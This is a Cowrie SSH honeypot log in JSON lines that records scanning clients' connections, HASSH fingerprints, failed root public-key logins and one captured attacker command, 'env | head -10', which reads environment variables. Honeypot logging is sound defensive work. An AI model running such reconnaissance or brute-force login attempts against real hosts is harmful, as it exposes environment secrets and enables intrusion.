{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:50.930957Z","src_ip":"212.227.235.229","session":"db41b57afd13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60644,"dst_ip":"1.2.3.4","dst_port":22,"session":"6664fef03925","protocol":"ssh","message":"New connection: 212.227.235.229:60644 (1.2.3.4:22) [session: 6664fef03925]","sensor":"my-vps","timestamp":"2025-08-31T07:00:51.289201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:00:51.290074Z","src_ip":"212.227.235.229","session":"6664fef03925"}
{"eventid":"cowrie.session.closed","duration":"42.2","message":"Connection lost after 42.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:51.366144Z","src_ip":"212.227.125.160","session":"61fdd260f701"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:00:51.648581Z","src_ip":"212.227.235.229","session":"6664fef03925"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:00:52.367309Z","src_ip":"212.227.235.229","session":"6664fef03925"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:52.367948Z","src_ip":"212.227.235.229","session":"6664fef03925"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:00:52.406448Z","src_ip":"212.227.125.160","session":"8181a16415b2"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-31T07:00:52.407194Z","src_ip":"212.227.125.160","session":"8181a16415b2"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","sensor":"my-vps","timestamp":"2025-08-31T07:00:52.727147Z","src_ip":"212.227.235.229","session":"6664fef03925"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:52.727822Z","src_ip":"212.227.235.229","session":"6664fef03925"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:53.087089Z","src_ip":"212.227.235.229","session":"6664fef03925"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:53.425012Z","src_ip":"212.227.125.160","session":"8181a16415b2"}
{"eventid":"cowrie.session.closed","duration":"14.8","message":"Connection lost after 14.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:53.426111Z","src_ip":"212.227.125.160","session":"8181a16415b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42968,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bff4f87868b","protocol":"ssh","message":"New connection: 212.227.235.229:42968 (1.2.3.4:22) [session: 5bff4f87868b]","sensor":"my-vps","timestamp":"2025-08-31T07:00:53.434739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:00:53.435539Z","src_ip":"212.227.235.229","session":"5bff4f87868b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:00:53.784567Z","src_ip":"212.227.235.229","session":"5bff4f87868b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:00:54.485412Z","src_ip":"212.227.235.229","session":"5bff4f87868b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:54.486029Z","src_ip":"212.227.235.229","session":"5bff4f87868b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAABAEAwsFzinSlj2egX2w1f3F0UrJWtt8ywSUuU6qWF0AOWhTTSQlHK1L+3aWMDJJFs9CE649Ur+E/x/5Q4ZR8Vl3u4K/do1/Gy3M+S8nFEdqAYv8RPvtAbxw2YnbtezeE9RXwLazjRC4EY3BDMdlLqOJ5LlBZnw36dsEwxjODaJtrXW61cV9VOuTcKr8VeBeOWw3n4DWFKES45QBI2OVyb4c0IcdgbJKJkRla/GqZVwPgK4YlkZg+LNhVk/TUtb5xWAWFCA9cXyIAHgYp83byluaA9+jHydXWpERLQtkw7Ea4V0O9FlHX34PYntLp10onBFKHgLvVz+Moxbe4vOi/c396LWd2b1XwqqWuXRyLp0YKcHwr9/A6NsTZCxWCQfXdw0l+86h/rW0CXgJXINhnkuYqO5QLIYCPMs08wqYd84ga/72tDYcAIq7Ga8Rl9nbV2Zs4h4YQ40lFsf0ou1EzgWoI4rrQLSXKvr5inBLTXG7zkIutGyM74EHio6hOGrSQgW47o8EtrctI/MAwjQJqnbHtfftZNCuAP+qKCsVEyG/LEG601r1JsW00Zl84ew5SEOzqE0CjJWGzT1T67+UNRWlIISIphJCi1+VTNykQHrfq1210VswCNKO10YNZRVS7VEbJY/Y7ea1b4q/VcDH/rE6ncDYcbfoBgEsW9ADZkZ7WV97yExIpnJDeoYBG27AQWkZL8bN8WZJ20doPvvxQyxI6go3l9LkXWNm3jFIdnqSCgLQvFz/UCtjtDxmnIzdNRN+B0QchMzRyir+iwBRdF9LCco31HkOQvGFfD7irXNbfzQ7TzFOYm2e9fcb3Hu/BYunpRNsz/k3OPtkRkpvFyjxnu1bISWI1/z/YMVnT9AnWuKztZfkwkOWyVpo1AswBwfz6CLCC29khQNKNOjuXAcCRMg2dem90QlgbM2H+qNlgbhiJHBAicvjrDU1dzQehUALRDP/ruPc2J1e8BGcsc4lr7qF0e/HjxF68rRZP7e9gIit1EYnm8Vh5KlY7dHbz1Canek5DijZAp0HiEM+W35QB8lvuUFXPS1rC2Uh5yevJXucm2jZvGlmKx69BhUmJn1yPwXu37bqxXAApKZLUkVdjC6K4esjSgBc1KHEAGGR5PbBC3gjlR3I91n+290kWxln3SRjYWrNd0n4LTzmij92gmQzI5jMV49cCgqyxgCd49HhVLUpZ50O1IgLqTgu0uf/fueQtVho/JoQy1pvvAIPt03qJwi1OG48GDlONEhZqms1wpXXng8RTDTTl44lbSB7TN3HB9bZmnpb5Eyc0Wt8srkFn2GFDcrLIU3PHjGTRwZzqEZK5V9jhNg46ZRgFLRPt2RmYQNLjIaLWgqQeDSWO3Q==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","sensor":"my-vps","timestamp":"2025-08-31T07:00:54.836528Z","src_ip":"212.227.235.229","session":"5bff4f87868b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAABAEAwsFzinSlj2egX2w1f3F0UrJWtt8ywSUuU6qWF0AOWhTTSQlHK1L+3aWMDJJFs9CE649Ur+E/x/5Q4ZR8Vl3u4K/do1/Gy3M+S8nFEdqAYv8RPvtAbxw2YnbtezeE9RXwLazjRC4EY3BDMdlLqOJ5LlBZnw36dsEwxjODaJtrXW61cV9VOuTcKr8VeBeOWw3n4DWFKES45QBI2OVyb4c0IcdgbJKJkRla/GqZVwPgK4YlkZg+LNhVk/TUtb5xWAWFCA9cXyIAHgYp83byluaA9+jHydXWpERLQtkw7Ea4V0O9FlHX34PYntLp10onBFKHgLvVz+Moxbe4vOi/c396LWd2b1XwqqWuXRyLp0YKcHwr9/A6NsTZCxWCQfXdw0l+86h/rW0CXgJXINhnkuYqO5QLIYCPMs08wqYd84ga/72tDYcAIq7Ga8Rl9nbV2Zs4h4YQ40lFsf0ou1EzgWoI4rrQLSXKvr5inBLTXG7zkIutGyM74EHio6hOGrSQgW47o8EtrctI/MAwjQJqnbHtfftZNCuAP+qKCsVEyG/LEG601r1JsW00Zl84ew5SEOzqE0CjJWGzT1T67+UNRWlIISIphJCi1+VTNykQHrfq1210VswCNKO10YNZRVS7VEbJY/Y7ea1b4q/VcDH/rE6ncDYcbfoBgEsW9ADZkZ7WV97yExIpnJDeoYBG27AQWkZL8bN8WZJ20doPvvxQyxI6go3l9LkXWNm3jFIdnqSCgLQvFz/UCtjtDxmnIzdNRN+B0QchMzRyir+iwBRdF9LCco31HkOQvGFfD7irXNbfzQ7TzFOYm2e9fcb3Hu/BYunpRNsz/k3OPtkRkpvFyjxnu1bISWI1/z/YMVnT9AnWuKztZfkwkOWyVpo1AswBwfz6CLCC29khQNKNOjuXAcCRMg2dem90QlgbM2H+qNlgbhiJHBAicvjrDU1dzQehUALRDP/ruPc2J1e8BGcsc4lr7qF0e/HjxF68rRZP7e9gIit1EYnm8Vh5KlY7dHbz1Canek5DijZAp0HiEM+W35QB8lvuUFXPS1rC2Uh5yevJXucm2jZvGlmKx69BhUmJn1yPwXu37bqxXAApKZLUkVdjC6K4esjSgBc1KHEAGGR5PbBC3gjlR3I91n+290kWxln3SRjYWrNd0n4LTzmij92gmQzI5jMV49cCgqyxgCd49HhVLUpZ50O1IgLqTgu0uf/fueQtVho/JoQy1pvvAIPt03qJwi1OG48GDlONEhZqms1wpXXng8RTDTTl44lbSB7TN3HB9bZmnpb5Eyc0Wt8srkFn2GFDcrLIU3PHjGTRwZzqEZK5V9jhNg46ZRgFLRPt2RmYQNLjIaLWgqQeDSWO3Q==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:54.837203Z","src_ip":"212.227.235.229","session":"5bff4f87868b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:55.188436Z","src_ip":"212.227.235.229","session":"5bff4f87868b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42980,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf60d381f1ed","protocol":"ssh","message":"New connection: 212.227.235.229:42980 (1.2.3.4:22) [session: cf60d381f1ed]","sensor":"my-vps","timestamp":"2025-08-31T07:00:55.535942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:00:55.536696Z","src_ip":"212.227.235.229","session":"cf60d381f1ed"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:00:55.885412Z","src_ip":"212.227.235.229","session":"cf60d381f1ed"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:00:56.584957Z","src_ip":"212.227.235.229","session":"cf60d381f1ed"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:56.585850Z","src_ip":"212.227.235.229","session":"cf60d381f1ed"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","sensor":"my-vps","timestamp":"2025-08-31T07:00:56.935696Z","src_ip":"212.227.235.229","session":"cf60d381f1ed"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:56.936417Z","src_ip":"212.227.235.229","session":"cf60d381f1ed"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:57.287059Z","src_ip":"212.227.235.229","session":"cf60d381f1ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42988,"dst_ip":"1.2.3.4","dst_port":22,"session":"b95b7fd63dfe","protocol":"ssh","message":"New connection: 212.227.235.229:42988 (1.2.3.4:22) [session: b95b7fd63dfe]","sensor":"my-vps","timestamp":"2025-08-31T07:00:57.637684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:00:57.638390Z","src_ip":"212.227.235.229","session":"b95b7fd63dfe"}
